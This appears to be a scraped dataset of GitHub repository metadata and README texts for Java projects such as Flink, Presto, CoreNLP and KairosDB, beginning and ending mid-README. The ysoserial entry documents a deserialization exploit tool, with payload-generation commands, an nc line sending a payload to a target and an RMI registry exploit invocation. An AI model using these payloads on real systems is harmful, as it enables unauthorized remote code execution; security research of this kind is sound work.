mvn -Dmybatis.generator.overwrite=true mybatis-generator:generate
```
## Tech Stack
| Technology | Link |
| --- | --- |
| Spring Boot | http://projects.spring.io/spring-boot/#quick-start |
| MyBatis | https://mybatis.org/mybatis-3/zh/index.html |
| MyBatis Generator | http://mybatis.org/generator/ |
| H2 | http://www.h2database.com/html/main.html |
| Flyway | https://flywaydb.org/getstarted/firststeps/maven |
|Lombok| https://www.projectlombok.org |
|Bootstrap|https://v3.bootcss.com/getting-started/|
|Github OAuth|https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/|
|UFile|https://github.com/ucloud/ufile-sdk-java|
|Bootstrap|https://v3.bootcss.com/getting-started/|
## Additional Resources
[Spring documentation](https://spring.io/guides)
[Spring Web](https://spring.io/guides/gs/serving-web-content/)
[es](https://elasticsearch.cn/explore)
[Github deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys)
[Bootstrap](https://v3.bootcss.com/getting-started/)
[Github OAuth](https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/)
[Spring](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#boot-features-embedded-database-support)
[Runoob tutorial](https://www.runoob.com/mysql/mysql-insert-query.html)
[Thymeleaf](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#setting-attribute-values)
[Spring Dev Tool](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#using-boot-devtools)
[Spring MVC](https://docs.spring.io/spring/docs/5.0.3.RELEASE/spring-framework-reference/web.html#mvc-handlermapping-interceptor)
[Markdown plugin](http://editor.md.ipandao.com/)
[UFfile SDK](https://github.com/ucloud/ufile-sdk-java)
[Count(*) VS Count(1)](https://mp.weixin.qq.com/s/Rwpke4BHu7Fz7KOpE2d3Lw)
[Git](https://git-scm.com/download)
[Visual Paradigm](https://www.visual-paradigm.com)
[Flyway](https://flywaydb.org/getstarted/firststeps/maven)
[Lombok](https://www.projectlombok.org)
[ctotree](https://www.octotree.io/)
[Table of content sidebar](https://chrome.google.com/webstore/detail/table-of-contents-sidebar/ohohkfheangmbedkgechjkmbepeikkej)
[One Tab](https://chrome.google.com/webstore/detail/chphlpgkkbolifaimnlloiipkdnihall)
[Live Reload](https://chrome.google.com/webstore/detail/livereload/jnihajbhpnppcggbcgedagnkighmdlei/related)
[Postman](https://chrome.google.com/webstore/detail/coohjcphdfgbiolnekdpbcijmhambjff)
## Changelog
- 2019-7-30 Fixed very short session expiration time
- 2019-8-2 Fixed search exceptions caused by the * and + characters
- 2019-8-18 Added home-page sorting by latest, hottest, and zero replies
- 2019-8-18 Fixed an exception when searching with the ? character
- 2019-8-22 Fixed the image size limit and the empty question content issue
- 2019-9-1 Added a dynamic navigation bar
- 2021-7-5 Fixed the custom Spring starter not being pulled due to network issues
## Contact Me
If you have any questions, scan the two QR codes below to reach me. The left one is my WeChat subscription account; follow it and reply '面试' (interview) to get my curated 20,000-word Alibaba interview notes. The right one is my personal WeChat; feel free to leave a message about any technical question.
| WeChat Official Account | Personal WeChat |
| --- | --- |
| 码匠笔记 | fit8295 |
| ![](https://mawen-cdn.cn-bj.ufileos.com/wxdyh-qr.jpeg?iopcmd=thumbnail&type=1&scale=50) | ![](http://mawen-cdn.cn-bj.ufileos.com/wechat.jpeg?iopcmd=thumbnail&type=1&scale=50) |
"
apache/ratis,master,1170,401,2017-01-31T08:00:07Z,10587,20,Open source Java implementation for Raft consensus protocol.,consensus consensus-protocol java raft,"
# Apache Ratis
*[Apache Ratis]* is a Java library that implements the Raft protocol [1],
where an extended version of the Raft paper is available at .
The paper introduces Raft and states its motivations in the following words:
> Raft is a consensus algorithm for managing a replicated log.
> It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos,
> but its structure is different from Paxos; this makes Raft more understandable than Paxos
> and also provides a better foundation for building practical systems.
Ratis aims to make Raft available as a java library that can be used by any system that needs to use a replicated log.
It provides pluggability for state machine implementations to manage replicated states.
It also provides pluggability for Raft log, rpc implementations and metric implementations to make it easy for integration with other projects.
Another important goal is to support high throughput data ingest so that it can be used for more general data replication use cases.
* To build the artifacts, see [BUILDING.md](BUILDING.md).
* To run the examples, see [ratis-examples/README.md](ratis-examples/README.md).
## Reference
1. Diego Ongaro and John Ousterhout,
_[In Search of an Understandable Consensus Algorithm][Ongaro2014]_,
2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319.
[Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro
[Apache Ratis]: https://ratis.apache.org/
"
allure-framework/allure2,main,3732,677,2016-05-27T14:06:05Z,14162,153,"Allure Report is a flexible, lightweight multi-language test reporting tool. It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process",allure reporting reporting-engine,"[license]: http://www.apache.org/licenses/LICENSE-2.0 ""Apache License 2.0""
[site]: https://allurereport.org/?source=github_allure2 ""Official Website""
[docs]: https://allurereport.org/docs/?source=github_allure2 ""Documentation""
[qametaio]: https://qameta.io/?source=Report_GitHub ""Qameta Software""
[blog]: https://qameta.io/blog ""Qameta Software Blog""
[Twitter]: https://twitter.com/QametaSoftware ""Qameta Software""
[twitter-team]: https://twitter.com/QametaSoftware/lists/team/members ""Team""
[build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml
[build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg
[maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ ""Maven Central""
[maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat
[release]: https://github.com/allure-framework/allure2/releases/latest ""Latest release""
[release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat
[CONTRIBUTING.md]: .github/CONTRIBUTING.md
[CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md
# Allure Report
[![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors)
> Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests.
- Learn more about Allure Report at [https://allurereport.org](https://allurereport.org)
- 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report
- ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community
- 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates
- 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community
- 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action
---
## Download
You can use one of the following ways to get Allure:
* Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section).
* Using Homebrew:
```bash
$ brew install allure
```
* For Windows, Allure is available from the [Scoop](http://scoop.sh/) command-line installer.
To install Allure, download and install Scoop and then execute in PowerShell:
```bash
scoop install allure
```
## How Allure Report works
Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems.
![How Allure Report works](.github/how_allure_works.jpg)
## Allure TestOps
[DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps.
## Contributors
This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md).
"
prestodb/presto,master,15585,5249,2012-08-09T01:03:37Z,210141,2042,The official home of the Presto distributed SQL query engine for big data,big-data data hadoop hive java lakehouse presto query sql,"# Presto
Presto is a distributed SQL query engine for big data.
See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation.
## Contributing!
Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started
## Questions?
[Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb)."
apache/flink,master,23134,12940,2014-06-07T07:00:10Z,489132,1178,Apache Flink,big-data flink java python scala sql,"# Apache Flink
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
Learn more about Flink at [https://flink.apache.org/](https://flink.apache.org/)
### Features
* A streaming-first runtime that supports both batch processing and data streaming programs
* Elegant and fluent APIs in Java and Scala
* A runtime that supports very high throughput and low event latency at the same time
* Support for *event time* and *out-of-order* processing in the DataStream API, based on the *Dataflow Model*
* Flexible windowing (time, count, sessions, custom triggers) across different time semantics (event time, processing time)
* Fault-tolerance with *exactly-once* processing guarantees
* Natural back-pressure in streaming programs
* Libraries for Graph processing (batch), Machine Learning (batch), and Complex Event Processing (streaming)
* Built-in support for iterative programs (BSP) in the DataSet (batch) API
* Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms
* Compatibility layers for Apache Hadoop MapReduce
* Integration with YARN, HDFS, HBase, and other components of the Apache Hadoop ecosystem
### Streaming Example
```scala
case class WordWithCount(word: String, count: Long)
val text = env.socketTextStream(host, port, '\n')
val windowCounts = text.flatMap { w => w.split(""\\s"") }
.map { w => WordWithCount(w, 1) }
.keyBy(""word"")
.window(TumblingProcessingTimeWindow.of(Time.seconds(5)))
.sum(""count"")
windowCounts.print()
```
### Batch Example
```scala
case class WordWithCount(word: String, count: Long)
val text = env.readTextFile(path)
val counts = text.flatMap { w => w.split(""\\s"") }
.map { w => WordWithCount(w, 1) }
.groupBy(""word"")
.sum(""count"")
counts.writeAsCsv(outputPath)
```
## Building Apache Flink from Source
Prerequisites for building Flink:
* Unix-like environment (we use Linux, Mac OS X, Cygwin, WSL)
* Git
* Maven (we require version 3.8.6)
* Java 8 or 11 (Java 9 or 10 may work)
```
git clone https://github.com/apache/flink.git
cd flink
./mvnw clean package -DskipTests # this will take up to 10 minutes
```
Flink is now installed in `build-target`.
## Developing Flink
The Flink committers use IntelliJ IDEA to develop the Flink codebase.
We recommend IntelliJ IDEA for developing projects that involve Scala code.
Minimal requirements for an IDE are:
* Support for Java and Scala (also mixed projects)
* Support for Maven with Java and Scala
### IntelliJ IDEA
The IntelliJ IDE supports Maven out of the box and offers a plugin for Scala development.
* IntelliJ download: [https://www.jetbrains.com/idea/](https://www.jetbrains.com/idea/)
* IntelliJ Scala Plugin: [https://plugins.jetbrains.com/plugin/?id=1347](https://plugins.jetbrains.com/plugin/?id=1347)
Check out our [Setting up IntelliJ](https://nightlies.apache.org/flink/flink-docs-master/flinkDev/ide_setup.html#intellij-idea) guide for details.
### Eclipse Scala IDE
**NOTE:** From our experience, this setup does not work with Flink
due to deficiencies of the old Eclipse version bundled with Scala IDE 3.0.3 or
due to version incompatibilities with the bundled Scala version in Scala IDE 4.4.1.
**We recommend using IntelliJ instead (see above).**
## Support
Don’t hesitate to ask!
Contact the developers and community on the [mailing lists](https://flink.apache.org/community.html#mailing-lists) if you need any help.
[Open an issue](https://issues.apache.org/jira/browse/FLINK) if you find a bug in Flink.
## Documentation
The documentation of Apache Flink is located on the website: [https://flink.apache.org](https://flink.apache.org)
or in the `docs/` directory of the source code.
## Fork and Contribute
This is an active open-source project. We are always open to people who want to use the system or contribute to it.
Contact us if you are looking for implementation tasks that fit your skills.
This article describes [how to contribute to Apache Flink](https://flink.apache.org/contributing/how-to-contribute.html).
## Externalized Connectors
Most Flink connectors have been externalized to individual repos under the [Apache Software Foundation](https://github.com/apache):
* [flink-connector-aws](https://github.com/apache/flink-connector-aws)
* [flink-connector-cassandra](https://github.com/apache/flink-connector-cassandra)
* [flink-connector-elasticsearch](https://github.com/apache/flink-connector-elasticsearch)
* [flink-connector-gcp-pubsub](https://github.com/apache/flink-connector-gcp-pubsub)
* [flink-connector-hbase](https://github.com/apache/flink-connector-hbase)
* [flink-connector-jdbc](https://github.com/apache/flink-connector-jdbc)
* [flink-connector-kafka](https://github.com/apache/flink-connector-kafka)
* [flink-connector-mongodb](https://github.com/apache/flink-connector-mongodb)
* [flink-connector-opensearch](https://github.com/apache/flink-connector-opensearch)
* [flink-connector-prometheus](https://github.com/apache/flink-connector-prometheus)
* [flink-connector-pulsar](https://github.com/apache/flink-connector-pulsar)
* [flink-connector-rabbitmq](https://github.com/apache/flink-connector-rabbitmq)
## About
Apache Flink is an open source project of The Apache Software Foundation (ASF).
The Apache Flink project originated from the [Stratosphere](http://stratosphere.eu) research project.
"
stanfordnlp/CoreNLP,main,9456,2694,2013-06-27T21:13:49Z,381906,177,"CoreNLP: A Java suite of core NLP tools for tokenization, sentence segmentation, NER, parsing, coreference, sentiment analysis, etc.",named-entity-recognition natural-language-processing nlp nlp-parsing stanford-nlp,"# Stanford CoreNLP
[![Run Tests](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml/badge.svg)](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml)
[![Maven Central](https://img.shields.io/maven-central/v/edu.stanford.nlp/stanford-corenlp.svg)](https://mvnrepository.com/artifact/edu.stanford.nlp/stanford-corenlp)
[![Twitter](https://img.shields.io/twitter/follow/stanfordnlp.svg?style=social&label=Follow)](https://twitter.com/stanfordnlp/)
[Stanford CoreNLP](http://stanfordnlp.github.io/CoreNLP/) provides a set of natural language analysis tools written in Java. It can take raw human language text input and give the base forms of words, their parts of speech, whether they are names of companies, people, etc., normalize and interpret dates, times, and numeric quantities, mark up the structure of sentences in terms of syntactic phrases or dependencies, and indicate which noun phrases refer to the same entities. It was originally developed for English, but now also provides varying levels of support for (Modern Standard) Arabic, (mainland) Chinese, French, German, Hungarian, Italian, and Spanish. Stanford CoreNLP is an integrated framework, which makes it very easy to apply a bunch of language analysis tools to a piece of text. Starting from plain text, you can run all the tools with just two lines of code. Its analyses provide the foundational building blocks for higher-level and domain-specific text understanding applications. Stanford CoreNLP is a set of stable and well-tested natural language processing tools, widely used by various groups in academia, industry, and government. The tools variously use rule-based, probabilistic machine learning, and deep learning components.
The Stanford CoreNLP code is written in Java and licensed under the GNU General Public License (v2 or later). Note that this is the full GPL, which allows many free uses, but not its use in proprietary software that you distribute to others.
### Build Instructions
Several times a year we distribute a new version of the software, which corresponds to a stable commit.
During the time between releases, one can always use the latest, under development version of our code.
Here are some helpful instructions to use the latest code:
#### Provided build
Sometimes we will provide updated jars here which have the latest version of the code.
At present, [the current released version of the code](https://stanfordnlp.github.io/CoreNLP/#download) is our most recent released jar, though you can always build the very latest from GitHub HEAD yourself.
#### Build with Ant
1. Make sure you have Ant installed, details here: [http://ant.apache.org/](http://ant.apache.org/)
2. Compile the code with this command: `cd CoreNLP ; ant`
3. Then run this command to build a jar with the latest version of the code: `cd CoreNLP/classes ; jar -cf ../stanford-corenlp.jar edu`
4. This will create a new jar called stanford-corenlp.jar in the CoreNLP folder which contains the latest code
5. The dependencies that work with the latest code are in CoreNLP/lib and CoreNLP/liblocal, so make sure to include those in your CLASSPATH.
6. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-models](http://nlp.stanford.edu/software/stanford-english-corenlp-models-current.jar), and [english-models-kbp](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in.
#### Build with Maven
1. Make sure you have Maven installed, details here: [https://maven.apache.org/](https://maven.apache.org/)
2. If you run this command in the CoreNLP directory: `mvn package` , it should run the tests and build this jar file: `CoreNLP/target/stanford-corenlp-4.5.4.jar`
3. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-extra-models](http://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar), and [english-kbp-models](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in.
4. If you want to use Stanford CoreNLP as part of a Maven project you need to install the models jars into your Maven repository. Below is a sample command for installing the Spanish models jar. For other languages just change the language name in the command. To install `stanford-corenlp-models-current.jar` you will need to set `-Dclassifier=models`. Here is the sample command for Spanish: `mvn install:install-file -Dfile=/location/of/stanford-spanish-corenlp-models-current.jar -DgroupId=edu.stanford.nlp -DartifactId=stanford-corenlp -Dversion=4.5.4 -Dclassifier=models-spanish -Dpackaging=jar`
#### Models
The models jars that correspond to the latest code can be found in the table below.
Some of the larger (English) models -- like the shift-reduce parser and WikiDict -- are not distributed with our default models jar.
These require downloading the English (extra) and English (kbp) jars. Resources for other languages require usage of the corresponding
models jar.
The best way to get the models is to use git-lfs and clone them from Hugging Face Hub.
For instance, to get the French models, run the following commands:
```
# Make sure you have git-lfs installed
# (https://git-lfs.github.com/)
git lfs install
git clone https://huggingface.co/stanfordnlp/corenlp-french
```
The jars can be directly downloaded from the links below or the Hugging Face Hub page as well.
| Language | Model Jar | Last Updated |
| --- | --- | --- |
| Arabic | [download](https://nlp.stanford.edu/software/stanford-arabic-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-arabic/tree/main) | 4.5.6 |
| Chinese | [download](https://nlp.stanford.edu/software/stanford-chinese-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-chinese/tree/main)| 4.5.6 |
| English (extra) | [download](https://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-extra/tree/main) | 4.5.6 |
| English (KBP) | [download](https://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-kbp/tree/main) | 4.5.6 |
| French | [download](https://nlp.stanford.edu/software/stanford-french-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-french/tree/main) | 4.5.6 |
| German | [download](https://nlp.stanford.edu/software/stanford-german-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-german/tree/main) | 4.5.6 |
| Hungarian | [download](https://nlp.stanford.edu/software/stanford-hungarian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-hungarian/tree/main) | 4.5.6 |
| Italian | [download](https://nlp.stanford.edu/software/stanford-italian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-italian/tree/main)| 4.5.6 |
| Spanish | [download](https://nlp.stanford.edu/software/stanford-spanish-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-spanish/tree/main)| 4.5.6 |
Thank you to [Hugging Face](https://huggingface.co/) for helping with our hosting!
### Install with Gradle
If you are not familiar with Gradle, see the official site: https://gradle.org
Add the following to your build.gradle, following [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.5/jar):
```Gradle
dependencies {
implementation 'edu.stanford.nlp:stanford-corenlp:4.5.5'
}
```
If you want to analyse English, add the following:
```Gradle
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models""
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models-english""
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models-english-kbp""
```
If you use another version, replace ""4.5.5"" with the version you use.
### Useful resources
You can find releases of Stanford CoreNLP on [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.4/jar).
You can find more explanation and documentation on [the Stanford CoreNLP homepage](http://stanfordnlp.github.io/CoreNLP/).
For information about making contributions to Stanford CoreNLP, see the file [CONTRIBUTING.md](CONTRIBUTING.md).
Questions about CoreNLP can either be posted on StackOverflow with the tag [stanford-nlp](http://stackoverflow.com/questions/tagged/stanford-nlp),
or on the [mailing lists](https://nlp.stanford.edu/software/#Mail).
"
kairosdb/kairosdb,develop,1725,345,2013-02-05T22:27:48Z,50191,136,Fast scalable time series database,java kairosdb metrics timeseries timeseries-database,"![KairosDB](webroot/img/kairosdb.png)
[![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb)
KairosDB is a fast, distributed, scalable time series database written on top of Cassandra.
## Documentation
Documentation is found [here](http://kairosdb.github.io/website/).
[Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions)
## Installing
Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases).
Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html)
If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md).
## Getting Involved
Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group).
## Contributing to KairosDB
Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there are plenty of tasks for non-Java programmers too, so don't be shy and join us!
What you can do for KairosDB:
- [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB.
- [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website.
- [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task.
If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue.
## License
The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0)
"
frohoff/ysoserial,master,7281,1709,2015-01-28T07:13:55Z,463,42,A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.,deserialization exploit gadget java javadeser jvm poc serialization vulnerability,"
# ysoserial
[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
[![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
[![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial)
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
![logo](ysoserial.png)
## Description
Originally released as part of AppSecCali 2015 Talk
[""Marshalling Pickles: how deserializing objects will ruin your day""](
https://frohoff.github.io/appseccali-marshalling-pickles/)
with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
Later updated to include additional gadget chains for
[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.
__ysoserial__ is a collection of utilities and property-oriented programming ""gadget chains"" discovered in common Java
libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
this data, the chain will automatically be invoked and cause the command to be executed on the application host.
It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
gadgets on the classpath.
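To make the distinction concrete, the vulnerable pattern on the application side is simply deserializing untrusted bytes; a minimal sketch (the handler and the source of the bytes are hypothetical) looks like this:
```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class UnsafeDeserialization {
    // Hypothetical handler: 'payload' stands for attacker-controlled bytes,
    // e.g. read from a socket or an HTTP request body.
    static Object handle(byte[] payload) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            // Unsafe: readObject() reconstructs whatever classes it finds on the classpath,
            // which is what allows a gadget chain to run during deserialization.
            return in.readObject();
        }
    }
}
```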
## Disclaimer
This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.
## Usage
```shell
$ java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
## Examples
```shell
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin
$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```
## Installation
[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.
## Building
Requires Java 1.7+ and Maven 3.x+
```mvn clean package -DskipTests```
## Code Status
[![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
## See Also
* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
"
zouzg/mybatis-generator-gui,master,6592,2517,2016-05-08T22:39:39Z,14934,116,mybatis-generator界面工具,让你生成代码更简单更快捷,,"mybatis-generator-gui
==============
mybatis-generator-gui is a GUI tool built on top of [mybatis generator](http://www.mybatis.org/generator/index.html). It lets you generate MyBatis Java POJO files and database mapping files quickly and easily.
![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png)
![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png)
![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png)
![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png)
### Core features
* Generate code easily by following the steps in the UI, without learning and maintaining verbose XML configuration
* Save database connections and generator configurations, so each round of code generation takes only a moment
* Ships with commonly used plugins, such as a pagination plugin
* Supports an OverSSH mode for reaching databases on an internal network through an SSH tunnel
* Turns table and column comments in the database into comments on the generated Java entities, keeping the entities readable
* Optionally strips comments that are unfriendly to version control, so diffs of regenerated files after adding or removing columns stay clean
* Currently supports MySQL, MySQL 8, Oracle, PostgreSQL and SQL Server; other less common databases are not supported for now. (MySQL support is the most mature; please report problems with other databases in an issue)
### Runtime requirements (important!!!)
